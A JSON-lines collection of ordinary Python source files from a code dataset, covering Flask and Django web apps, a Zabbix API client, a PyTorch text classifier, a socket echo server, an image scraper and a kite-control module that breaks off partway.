+{"seq_id":"118620756","text":"# def square_numbers(nums):\n# result = []\n# for i in nums:\n# result.append(i * i)\n# return result\n\n# my_nums = square_numbers([1, 2, 3, 4, 5])\n\n# print (my_nums)\n\n\n\n# def square_numbers(nums):\n# for i in nums:\n# yield i * i\n\n# my_nums = square_numbers([1, 2, 3, 4, 5])\n\n# for num in my_nums:\n# print(num)\n\n\nfrom __future__ import division\nimport os\nimport psutil\nimport random\nimport time\n\nnames = ['1', '2', '3', '4', '5', '6']\nmajors = ['A', 'B', 'C', 'D', 'E']\n\nprocess = psutil.Process(os.getpid())\nmem_before = process.memory_info().rss / 1024 / 1024\n\n\ndef people_list(num_people):\n result = []\n for i in range(num_people):\n person = {\n 'id': i,\n 'name': random.choice(names),\n 'major': random.choice(majors)\n }\n result.append(person)\n return result\n\n\ndef people_generator(num_people):\n for i in range(num_people):\n person = {\n 'id': i,\n 'name': random.choice(names),\n 'major': random.choice(majors)\n }\n yield person\n\nt1 = time.clock()\n#people = people_list(1000000) \npeople = people_generator(1000000) \nt2 = time.clock()\nmem_after = process.memory_info().rss / 1024 / 1024\ntotal_time = t2 - t1\nfor p in people:\n print(p)\n\nprint ('Before MEM: {} MB'.format(mem_before))\nprint ('After MEM: {} MB'.format(mem_after))\nprint ('Total Sec: {:.6f} sec'.format(total_time))","sub_path":"generator (2).py","file_name":"generator (2).py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399352940","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\nimport json\nimport time\nimport requests\nimport parame\nimport sys\nimport re\nfrom QuerySet import kwargs\n\nclass Api:\n def __init__(self):\n self.url = 'https://z.baidu.com/api_jsonrpc.php'\n self.headers = {'Content-Type': 'application/json'}\n auth = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": parame.zabbix_user,\n \"password\":parame.zabbix_pass\n },\n \"id\": 1,\n \"auth\":None,\n }\n response = requests.post(self.url,data=json.dumps(auth),headers=self.headers)\n self.authid = json.loads(response.text)['result'] ### auth的id\n\n def get_host(self,hosts): #数据库传递进来的主机参数\n data = parame.host_get\n data['auth'] = self.authid ###将返回id 写进去 接口会验证这个唯一\n if hosts: ### 判断是否为空 为空说明没有找到主机 直接退出 \n pass\n else:\n print(\"result not found\")\n sys.exit(10)\n for host in hosts:\n data['params']['filter']['host'].append(host) ###将主机加入参数里面\n response = requests.post(self.url,data=json.dumps(data),headers=self.headers)\n lists = json.loads(response.text)['result']\n result = [ lists[i]['hostid'] for i in range(len(lists)) ]\n return result ###返回主机hostsid \n\n def graph_get(self,res): ###请求主机图形结果\n hosts_id = self.get_host(res) ### 把hostsid 赋值给hosts_id \n data = parame.graph_get\n data['auth'] = self.authid\n for hosts in hosts_id:\n data['params']['hostids'].append(hosts)\n response = requests.post(self.url,data=json.dumps(data),headers=self.headers)\n graph_id = json.loads(response.text)['result']\n result = []\n for index in range(len(graph_id)):\n result.append(graph_id[index]['graphid'])\n return result\n\n def screen_add(self,graph_ids,screen_name): ###创建图形\n response = self.graph_get(graph_ids)\n x = 0 ### x为行 此处的定义 取决于parame.screen_add 里面的hsize 和vsize 最多为 hsize - 1 or vsize -1 \n y = 0 ### y为列 \n parame.screen_add['params']['name'] = screen_name\n parame.screen_add['auth'] = self.authid\n for value in response:\n parame.screen_add['params']['screenitems'].append({\n \"resourcetype\": 0,\n \"resourceid\": value,\n \"width\": \"500\", ###宽高度\n \"height\": \"100\",\n \"rowspan\": 1,\n \"colspan\": 1,\n \"x\": x,\n \"y\": y\n })\n if x == 1: ###此处判断 我们需求只需要两行一列 等于1 x为0 \n x = 0\n y += 1\n else:\n x += 1\n time.sleep(0.01)\n response = requests.post(self.url,data=json.dumps(parame.screen_add),headers=self.headers)\n\nif __name__ == '__main__':\n try:\n func = Api()\n res = kwargs(\"%\" + str(sys.argv[4]) + \"%\") ###数据库传递的参数\n func.screen_add(res,str(sys.argv[2])) ### 聚合图形群组名\n\n except Exception as e:\n print(e)\n print('--name 聚合图形组名 --hostname 匹配加入的主机')\n sys.exit(1)\n","sub_path":"screen_api.py","file_name":"screen_api.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600752522","text":"from PyQt5.QtCore import QObject, pyqtSignal\nfrom INTERACTION1.DRIVER.Interaction.PumpsStation.Liquid._OneSensor import OneSensor\n\nLIQUID_TYPE = {0: 'WATER', 1: 'ALKALI', 2: 'ACID', 3: 'WHEEL', 4: 'WAX'}\n\n\nclass Liquid(QObject):\n\n sign_data = pyqtSignal(dict) # liquid_data\n\n def __init__(self, pi, rx_pins, tx_pins):\n super().__init__()\n # LIQUID\n self._liquid = dict()\n self._liquid_data = {'WATER': None, 'ALKALI': None, 'ACID': None, 'WHEEL': None, 'WAX': None}\n for sid, rx_pin in enumerate(rx_pins):\n self._liquid[LIQUID_TYPE[sid]] = OneSensor(pi=pi, sid=sid, rx_pin=rx_pin, tx_pin=tx_pins[sid], data_cb=self._data)\n\n def _data(self, sid, data):\n self._liquid_data[LIQUID_TYPE[sid]] = data\n if None not in self._liquid_data.values():\n print(self._liquid_data.copy())\n self.sign_data.emit(self._liquid_data.copy())\n for LIQUID_TYPE[sid] in self._liquid_data.keys():\n self._liquid_data[LIQUID_TYPE[sid]] = None\n\n\nif __name__ == '__main__':\n import os\n import pigpio\n\n _pi = pigpio.pi()\n if not _pi.connected:\n os.system('sudo pigpiod')\n _pi = pigpio.pi()\n\n liquid = Liquid(pi=_pi, rx_pins=[15, 24, 8, 12, 20], tx_pins=[14, 23, 25, 7, 16])\n liquid.sign_data.connect(lambda x: print(x))\n","sub_path":"INTERACTION1/DRIVER/Interaction/PumpsStation/Liquid/Liquid.py","file_name":"Liquid.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"137043831","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal\nfrom flask import render_template\nfrom flask.ext.mail import Message\nfrom html2text import html2text\nfrom premailer import transform as email_transform\nfrom .models import Order, LineItem, LINE_ITEM_STATUS, CURRENCY_SYMBOL\nfrom . import mail, app\n\n\ndef send_receipt_email(order_id, subject=\"Thank you for your order!\"):\n \"\"\"\n Sends an link to fill attendee details and cash receipt to the order's buyer\n \"\"\"\n with app.test_request_context():\n order = Order.query.get(order_id)\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n line_items = LineItem.query.filter(LineItem.order == order, LineItem.status == LINE_ITEM_STATUS.CONFIRMED).order_by(\"line_item_seq asc\").all()\n html = email_transform(render_template('attendee_assigment.html', order=order, org=order.organization, line_items=line_items, base_url=app.config['BASE_URL']))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n\n\ndef send_participant_assignment_mail(order_id, item_collection_title, team_member, subject=\"Please tell us who's coming!\"):\n with app.test_request_context():\n order = Order.query.get(order_id)\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n html = email_transform(render_template('participant_assignment_mail.html', base_url=app.config['BASE_URL'], order=order, org=order.organization, item_collection_title=item_collection_title, team_member=team_member))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n\n\ndef send_line_item_cancellation_mail(line_item_id, subject=\"Ticket Cancellation\"):\n with app.test_request_context():\n line_item = LineItem.query.get(line_item_id)\n item_title = line_item.item.title\n order = line_item.order\n is_paid = line_item.final_amount > Decimal('0')\n msg = Message(subject=subject, recipients=[order.buyer_email], bcc=[order.organization.contact_email])\n # Only INR is supported as of now\n html = email_transform(render_template('line_item_cancellation_mail.html',\n base_url=app.config['BASE_URL'],\n order=order, line_item=line_item, item_title=item_title, org=order.organization, is_paid=is_paid,\n currency_symbol=CURRENCY_SYMBOL['INR']))\n msg.html = html\n msg.body = html2text(html)\n mail.send(msg)\n","sub_path":"boxoffice/mailclient.py","file_name":"mailclient.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"320327129","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\nfrom argparse import ArgumentParser\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nimport torch\nimport tqdm\nfrom torch import nn\nfrom torch.utils import data\nimport pickle\nimport numpy as np\nimport gensim\nimport logging\nimport zipfile\nimport json\nimport random\nimport time\n\nimport torch.nn.functional as F\nfrom loader import TSVDataset\nfrom models import Classifier\nfrom torch.utils.data import DataLoader\n\ndef load_embedding(modelfile):\n # Binary word2vec format:\n if modelfile.endswith(\".bin.gz\") or modelfile.endswith(\".bin\"):\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n modelfile, binary=True, unicode_errors=\"replace\"\n )\n # Text word2vec format:\n elif (\n modelfile.endswith(\".txt.gz\")\n or modelfile.endswith(\".txt\")\n or modelfile.endswith(\".vec.gz\")\n or modelfile.endswith(\".vec\")\n ):\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n modelfile, binary=False, unicode_errors=\"replace\"\n )\n # ZIP archive from the NLPL vector repository:\n elif modelfile.endswith(\".zip\"):\n with zipfile.ZipFile(modelfile, \"r\") as archive:\n # Loading and showing the metadata of the model:\n metafile = archive.open(\"meta.json\")\n metadata = json.loads(metafile.read())\n for key in metadata:\n print(key, metadata[key])\n print(\"============\")\n # Loading the model itself:\n stream = archive.open(\n \"model.bin\" # or model.txt, if you want to look at the model\n )\n emb_model = gensim.models.KeyedVectors.load_word2vec_format(\n stream, binary=True, unicode_errors=\"replace\"\n )\n else: # Native Gensim format?\n emb_model = gensim.models.KeyedVectors.load(modelfile)\n # If you intend to train the model further:\n # emb_model = gensim.models.Word2Vec.load(embeddings_file)\n # Unit-normalizing the vectors (if they aren't already):\n emb_model.init_sims(\n replace=True\n )\n return emb_model\n\ndef evaluate(model, data, labels=None):\n #evalutate the model, returns scores\n gold, predictions = [], []\n for n, (input_data, gold_label) in enumerate(data):\n out = model(input_data)\n predicted = out.argmax(axis=1)\n gold.extend(gold_label.tolist())\n predictions.extend(predicted.tolist())\n\n if labels:\n print(metrics.classification_report(gold, predictions, target_names=labels))\n\n return metrics.accuracy_score(gold, predictions)\n #return metrics.f1_score(gold, predictions, average='macro')\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"--path\", default=\"stanford_sentiment_binary.tsv.gz\")\n parser.add_argument(\"--save\", default=\"test\")\n parser.add_argument(\"--vocab_size\", action=\"store\", type=int, default=2000)\n parser.add_argument(\"--hidden_dim\", action=\"store\", type=int, default=128)\n parser.add_argument(\"--batch_size\", action=\"store\", type=int, default=32)\n parser.add_argument(\"--lr\", action=\"store\", type=float, default=1e-3)\n parser.add_argument(\"--epochs\", action=\"store\", type=int, default=15)\n parser.add_argument(\"--split\", action=\"store\", type=float, default=0.8)\n\n parser.add_argument(\"--embeddings\", action=\"store\", default=\"40.zip\")\n\n args = parser.parse_args()\n\n #setting a seed for reproducibility\n torch.manual_seed(42)\n\n print(\"Loading the embeddings...\\n\")\n\n embeddings_model = load_embedding(args.embeddings)\n args.vocab_size = len(embeddings_model.wv.vocab)\n\n embeddings_model.add('', weights=torch.zeros(embeddings_model.vector_size))\n\n print(\"Loading the dataset...\\n\")\n \n df = pd.read_csv(args.path, sep='\\t', header=0, compression='gzip')\n df = df[df.label != 'label']\n\n #split the dataset in train and val with a given split given from args, defalut=0.2\n train_df, val_df = train_test_split(df, train_size=args.split)\n train_dataset = TSVDataset(args, train_df, embeddings_model=embeddings_model)\n val_dataset = TSVDataset(args, val_df, vocab=train_dataset.vocab, embeddings_model=train_dataset.embeddings)\n\n print(train_dataset.indexers['label'])\n\n model = Classifier(args, train_dataset.num_labels, embeddings_model)\n criterion = nn.CrossEntropyLoss()\n optimiser = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n val_labels = []\n val_predictions = []\n\n def pad_batches(batch, pad_idx):\n #padding the batches\n longest_sentence = max([X.size(0) for X, y in batch])\n\n new_X = torch.stack([F.pad(X, (0, longest_sentence - X.size(0)), value=pad_idx) for X, y in batch])\n new_y = torch.stack([y for X, y in batch])\n\n return new_X, new_y\n\n pad_idx = embeddings_model.vocab[''].index\n batch_size = 16\n loader = DataLoader(dataset=train_dataset, batch_size=batch_size, collate_fn=lambda x: pad_batches(x, pad_idx))\n\n #training, looping over all the batches\n for epoch in range(args.epochs):\n model.train()\n for i, batch in enumerate(tqdm.tqdm(loader)):\n text = batch[0]\n label = batch[1]\n for n in range(len(text)):\n optimiser.zero_grad()\n y_pred = model(text[n])\n loss = criterion(y_pred, label[n])\n loss.backward()\n optimiser.step()\n\n #evaluation\n model.eval()\n train_f1 = evaluate(model, train_dataset)\n val_f1 = evaluate(model, val_dataset)\n\n print(f\"epoch: {epoch}\\tloss: {loss.item():.3f}\\tAccuracy: {train_f1:.3f}\")\n print(f\"Validation Accuracy: {val_f1:.3f}\")\n\n #save the model as a pickle\n torch.save({'model': model.state_dict(),\n 'training_args': args}, f\"{args.save}_model.pt\")","sub_path":"obligatory2/2/oblig2_train_model_with_dataloader.py","file_name":"oblig2_train_model_with_dataloader.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52843868","text":"# coding:UTF-8\n\nfrom PIL import Image\n\nim = Image.open('test.jpg') # open the picture\nend_name = im.format # 得到后缀\n(width, height) = im.size\n# 初始化left,upper,right,lower\ncount = 1\nfor i in range(3): # 行\n for j in range(3): # 列\n upper = int(i*(1/3)*height)\n lower = int((i+1)*(1/3)*height)\n left = int(j*(1/3)*width)\n right = int((j+1)*(1/3)*width)\n newIm = Image.new('RGBA', (int(1/3*width), int(1/3*height)), (0, 0, 0))\n new_im = im.crop((left,upper,right,lower))\n newsize_width,newsize_height = new_im.size\n newIm.paste(new_im, (0,0,newsize_width,newsize_height))\n new_name = str(count)+'.'+end_name\n newIm.save(new_name,end_name)\n count += 1\nim.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"579104355","text":"# Brian Cheng\n# Eric Liu\n# Brent Min\n\n# views.py contains the logic needed to do form validation and render the various webpages of\n# the heroku app\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.validators import URLValidator\n\nfrom .forms import RecInputForm\n\nimport os\n\nimport sys\nsys.path.append('../../..')\n\ndef about(request):\n return render(request, \"about.html\")\n\ndef developers(request):\n return render(request, \"developers.html\")\n\ndef algorithims(request):\n return render(request, \"algorithims.html\")\n\ndef template(form=None, notes=\"\", latitude=33.8734, longitude=-115.9010, results=[]):\n \"\"\"\n A nice way to update all template inputs to the render functions all at once.\n\n :param: form The current contents of the main form. This input allows the site to\n remember what the user has previously entered\n :param: notes Various notes to display to the user. Commonly used for debug messages\n and reporting errors from form validation\n :param: latitude The latitude to display on the map. Default is at JTree\n :param: longitude The longitude to display on the map. Default is at JTree\n :param: results A list containing the recommendations. This is formatted by django\n templates\n\n :return: dict A dictionary as shown below \n \"\"\"\n template_default = {\n \"form\": form,\n \"notes\": notes,\n \"latitude\": latitude,\n \"longitude\": longitude,\n \"results\": results,\n \"google_maps_api_key\": os.getenv(\"GOOGLE_MAPS_API_KEY\")\n }\n\n return template_default\n\ndef bootstrap4_index(request):\n # enter if the button is pressed on the website\n if(request.method == \"POST\"):\n\n form = RecInputForm(request.POST)\n\n if(form.is_valid()):\n\n # run the secondary validation code\n inputs = secondary_validation(form)\n\n # if there are errors, then the bool flag would be true\n if(inputs[1]):\n return render(request, 'index.html', template(form, inputs[1], \n inputs[0][\"location\"][0], inputs[0][\"location\"][1]))\n\n # run the main code\n from run import main\n results = main(inputs[0])\n\n # # transform the return dictionary into the proper format for django templates\n # trans_results = format_django(results)\n\n # return the value of the main code\n return render(request, 'index.html', template(form, results[\"notes\"], \n inputs[0][\"location\"][0], inputs[0][\"location\"][1], results[\"recommendations\"]))\n\n return render(request, 'index.html', template(form))\n\n # note on opening the website, set the initial recommender to be top_pop\n form = RecInputForm(initial={\"rec\": \"top_pop\"})\n return render(request, 'index.html', template(form))\n\ndef secondary_validation(form): \n \"\"\"\n This function runs some secondary validation code that I could not integrate into django\n without it messing up the website style\n\n :param: form The form containing cleaned data\n\n :return: (dict, str) The dict contains the input to the main function, and the string \n contains the error message (can be \"\")\n \"\"\"\n # store error string here if necessary\n errors = []\n\n # get the url\n url = form.cleaned_data[\"url\"]\n\n # if top popular recommender is chosen, don't enter and don't validate url\n if not (form.cleaned_data[\"rec\"][0]==\"top_pop\" or form.cleaned_data[\"rec\"][0]==\"debug\"):\n if url == '':\n errors.append(f\"Must input a Mountain Project user URL\")\n else:\n # validate the url structure\n validator = URLValidator()\n try:\n validator(url)\n except ValidationError:\n errors.append(f\"Mountain Project URL ({url}) is not a valid user page.\")\n\n # validate that the url contains both \"mountainproject.com\" and \"user\"\n if((len(errors) == 0) and ((\"mountainproject.com\" not in url) or (\"user\" not in url))):\n errors.append(f\"Mountain Project URL ({url}) is not a valid user page.\")\n\n # get the boulder grades\n if(form.cleaned_data[\"get_boulder\"]):\n bl = int(form.cleaned_data[\"boulder_lower\"])\n bu = int(form.cleaned_data[\"boulder_upper\"])\n\n # validate the boulder grades if the box is checked\n if(bl > bu):\n error_str = f\"Lowest Boulder Grade (V{bl}) should be less than or equal to Highest \" \\\n f\"Boulder Grade (V{bu}).\"\n errors.append(error_str)\n # if the user did not want boulders\n else:\n bl = -1\n bu = -1\n\n # get the route grades\n if(form.cleaned_data[\"get_route\"]):\n rl = route_to_int(form.cleaned_data[\"route_lower\"])\n ru = route_to_int(form.cleaned_data[\"route_upper\"])\n\n # validate the route grades\n if(rl is None):\n error_str = f\"Lowest Route Grade (5.{form.cleaned_data['route_lower']}) is an \" \\\n \"invalid difficulty.\"\n errors.append(error_str)\n if(ru is None):\n error_str = f\"Highest Route Grade (5.{form.cleaned_data['route_upper']}) is an \" \\\n \"invalid difficulty.\\n\"\n errors.append(error_str)\n if((rl is not None) and (ru is not None)):\n if(rl > ru):\n error_str = f\"Lowest Route Grade (5.{form.cleaned_data['route_lower']}) should \" \\\n \"be less than or equal to Highest Route Grade \" \\\n f\"(5.{form.cleaned_data['route_upper']}).\\n\"\n errors.append(error_str)\n # if the user did not want routes\n else: \n rl = -1\n ru = -1\n\n # make sure that the user selected at least one of boulder/route\n if(bl == -1 and rl == -1):\n errors.append(\"One of Boulder or Route must be checked.\\n\")\n\n # create the config dictionary to pass into main\n inputs = {\n \"user_url\": form.cleaned_data[\"url\"],\n \"location\": [form.cleaned_data[\"latitude\"], form.cleaned_data[\"longitude\"]],\n \"max_distance\": form.cleaned_data[\"max_distance\"],\n \"recommender\": form.cleaned_data[\"rec\"][0], # note for some reason [\"rec\"] is a list\n \"num_recs\": form.cleaned_data[\"num_recs\"],\n \"difficulty_range\": {\n \"boulder\": [bl, bu],\n \"route\": [rl, ru]\n }\n }\n return (inputs, errors)\n\ndef route_to_int(route_str):\n \"\"\"\n This function takes a route string and turns it into an integer\n\n :param: route_str The stuff after the \"5.\". Can be anything from \"1\" to \"15d\"\n\n :return: int An integer representation of the grade\n \"\"\"\n mapping = ['3rd', '4th', 'Easy 5th', '0', \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\",\n \"10a\", \"10b\", \"10c\", \"10d\", \"11a\", \"11b\", \"11c\", \"11d\", \"12a\", \"12b\", \"12c\", \"12d\", \"13a\", \n \"13b\", \"13c\", \"13d\", \"14a\", \"14b\", \"14c\", \"14d\", \"15a\", \"15b\", \"15c\", \"15d\"]\n if route_str[-1] == '+' or route_str[-1] == '-':\n route_str = route_str[:-1]\n if route_str == '10':\n route_str = '10a'\n if route_str == '11':\n route_str = '11a'\n if route_str == '12':\n route_str = '12a'\n if route_str == '13':\n route_str = '13a'\n if route_str == '14':\n route_str = '14a'\n if route_str == '15':\n route_str = '15a'\n\n try:\n return mapping.index(route_str.lower())\n except ValueError:\n return None\n","sub_path":"mysite/bootstrap4/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"117794835","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\nimport threading\r\nfrom datetime import datetime\r\nimport time\r\n\r\nHOST = '127.0.0.1' # サーバーのIPアドレス\r\nPORT = 10500 # サーバーの待ち受けポート\r\nDATESIZE = 1024 # 受信データバイト数\r\nCLIENTNUM = 3 # クライアントの接続上限数\r\n\r\n# サーバー起動 \r\ndef run_server():\r\n\r\n # server_socketインスタンスを生成\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:\r\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n server_socket.bind((HOST, PORT))\r\n server_socket.listen(CLIENTNUM)\r\n print('[{}] run server'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\r\n \r\n while True:\r\n # クライアントからの接続要求受け入れ\r\n client_socket, address = server_socket.accept()\r\n print('[{0}] connect client -> address : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), address) )\r\n client_socket.settimeout(60)\r\n # クライアントごとにThread起動 send/recvのやり取りをする\r\n t = threading.Thread(target = conn_client, args = (client_socket,address))\r\n t.setDaemon(True)\r\n t.start()\r\n\r\n# クライアントごとにThread起動する関数\r\ndef conn_client(client_socket, address):\r\n \r\n with client_socket:\r\n while True:\r\n # クライアントからデータ受信\r\n rcv_data = client_socket.recv(DATESIZE)\r\n if rcv_data:\r\n # データ受信したデータをそのままクライアントへ送信\r\n client_socket.send(rcv_data)\r\n print('[{0}] recv date : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), rcv_data.decode('utf-8')) )\r\n else:\r\n break\r\n\r\n print('[{0}] disconnect client -> address : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), address) )\r\n\r\nif __name__ == \"__main__\":\r\n \r\n run_server()","sub_path":"test_ample/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"543686549","text":"from flask_app import app\r\nfrom flask import render_template, redirect, request\r\nfrom flask_app.models.dojo import Dojo\r\n\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return redirect(\"/dojos\")\r\n\r\n@app.route(\"/dojos\")\r\ndef show_all():\r\n dojos = Dojo.get_all()\r\n return render_template(\"dojos.html\", all_dojos=dojos)\r\n\r\n@app.route(\"/dojo/\")\r\ndef show_one(id):\r\n data = {\r\n \"id\":id\r\n }\r\n return render_template(\"dojo.html\", dojo = Dojo.get_one_ninjas(data))\r\n\r\n\r\n@app.route(\"/create/dojo\", methods=[\"POST\"])\r\ndef create_dojo():\r\n Dojo.add(request.form)\r\n return redirect('/')","sub_path":"dojos_ninjas/flask_app/controllers/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"341038274","text":"from db import db\nimport users\n\ndef get_list():\n sql = \"SELECT M.content, U.username, M.sent_at FROM messages M, users U WHERE M.user_id=U.id ORDER BY M.id\"\n result = db.session.execute(sql)\n return result.fetchall()\n\ndef send(content):\n user_id = users.user_id()\n if user_id == 0:\n return False\n sql = \"INSERT INTO messages (content, user_id, sent_at) VALUES (:content, :user_id, NOW())\"\n db.session.execute(sql, {\"content\":content, \"user_id\":user_id})\n db.session.commit()\n return True\n","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585754947","text":"from collections import defaultdict\n\n\"\"\"\nDefinition for a point.\n\"\"\"\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n\nclass Solution:\n \"\"\"\n @param n: An integer\n @param m: An integer\n @param operators: an array of point\n @return: an integer array\n \"\"\"\n def numIslands2(self, n, m, operators):\n # write your code here\n sea = [[0] * m for _ in range(n)]\n marker_to_island_map = dict()\n island_to_marker_map = defaultdict(list)\n marker = 1\n num_islands = []\n for op in operators:\n connected_islands = set()\n if sea[op.x][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y]])\n if op.x - 1 >= 0 and sea[op.x-1][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x-1][op.y]])\n if op.x + 1 < n and sea[op.x+1][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x+1][op.y]])\n if op.y - 1 >= 0 and sea[op.x][op.y-1] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y-1]])\n if op.y + 1 < m and sea[op.x][op.y+1] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y+1]])\n if len(connected_islands) == 0:\n # Not connect to any islands.\n sea[op.x][op.y] = marker\n marker_to_island_map[marker] = marker\n island_to_marker_map[marker].append(marker)\n marker += 1\n elif len(connected_islands) == 1:\n # Connect only to one island.\n island = connected_islands.pop()\n sea[op.x][op.y] = island_to_marker_map[island][0]\n else:\n # Connect to more than one island.\n merge_to_island = connected_islands.pop()\n for island in connected_islands:\n for mk in island_to_marker_map[island]:\n marker_to_island_map[mk] = merge_to_island\n island_to_marker_map[merge_to_island].append(mk)\n island_to_marker_map.pop(island)\n sea[op.x][op.y] = island_to_marker_map[merge_to_island][0]\n num_islands.append(len(island_to_marker_map.keys()))\n return num_islands","sub_path":"python3/l0305_number_of_islands_2.py","file_name":"l0305_number_of_islands_2.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"333955934","text":"import asyncio\nimport os\nimport re\nimport time\n\nimport aiohttp\n\nstart_url = 'https://www.doutula.com/article/list/?page={num}'\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'\n}\n\n\nasync def fetch_imglist(html):\n reg = re.compile(r'data-original=\"https://ws\\d(.*?)\".*?alt=\"(.*?)\"', re.S)\n imglist = reg.findall(html)\n return imglist\n\n\nasync def fetch_url(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers=headers) as resp:\n html = await resp.text()\n imglist = await fetch_imglist(html)\n # 获得正则匹配数量和匹配的页面链接\n print('*' * 10, str(len(imglist)), url)\n return imglist\n\n\nasync def fetch_img(imglist):\n async with aiohttp.ClientSession() as session:\n for url, name in imglist:\n imgurl = \"http://ws1\" + url\n async with session.get(imgurl, headers=headers) as resp:\n content = await resp.read()\n # 创建文件名去掉非法字符\n fileName = re.sub('[\\/:*?\"<>|]', '-', name[:180] + url[-4:])\n try:\n with open('./pic/{}'.format(fileName), 'wb') as f:\n f.write(content)\n print('保存{}成功'.format(imgurl))\n except IOError as e:\n print('出错啦!{}{}'.format(e, imgurl))\n\n\nasync def main(x):\n url = start_url.format(num=x)\n print('页面链接为:{}'.format(url))\n imglist = await asyncio.ensure_future(fetch_url(url))\n await asyncio.ensure_future(fetch_img(imglist))\n\n\nif __name__ == '__main__':\n start = time.time()\n if not os.path.isdir('./pic'):\n os.mkdir('./pic')\n loop = asyncio.get_event_loop()\n tasks = [asyncio.ensure_future(main(x)) for x in range(1, 7)]\n # 最多处理5个页面\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n print('total {} files,time cost:{}'.format(\n len(os.listdir('./pic')),\n time.time() - start))\n","sub_path":"Emoticon Files/Advanced learning/asyncio练习爬虫/spider04.py","file_name":"spider04.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100712526","text":"#!/usr/bin/env python\n#\n\"\"\"\nThis file should do the following things\n 1 Calculate a default route for the kite based on settings or parameters applied - done\n 2 Identify the flight zone which will be left, right or centre in fig8\n and park_left, park_right - done\n 3 Identify the flight mode - currently proposing park wiggle and fig8up we always start with park\n 4 Has phase change or zone changed or are we starting\n 3 Set route - otherwise we know the preferred route\n 4 Staring point will always be park and the target for that is kite angle of zero and to be at top of centre line\n 5 Probably then go left a bit and right a bit - lets call that wiggle mode - but we align first\n 6 Then move into fig 8 with upturns - let's always start left and should be aimed high - probably just need\n to display a centre line and always draw fig 8 and resize manually for now - full automation of that can\n be later - this will be set in motion manually\n 7 Once there we flick into upturn and measure turn radius for a few cycles - turn stops when kite is round 180deg\n 8 Then repeat to other side -\n 9 At some point we would switch to doing down turns but that can probably be well after upturns work reliably so\n 10 Upturns only for now\n\"\"\"\n\nimport os, time\nimport math\nfrom collections import deque\nfrom kite_funcs import checklimits, getresist, conmaxright, conmaxleft, conresistleft, conresistright, conresistcentre\nfrom move_func import move_item\nfrom dotenv import find_dotenv, load_dotenv\nload_dotenv(find_dotenv())\n\n\ndef calcbarangle(kite, base, controls):\n \"\"\"This should just basically set the target bar angle based on the mode phase\n and zone we are in when in park or wiggle mode\n >>> k=Kite(400, targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n 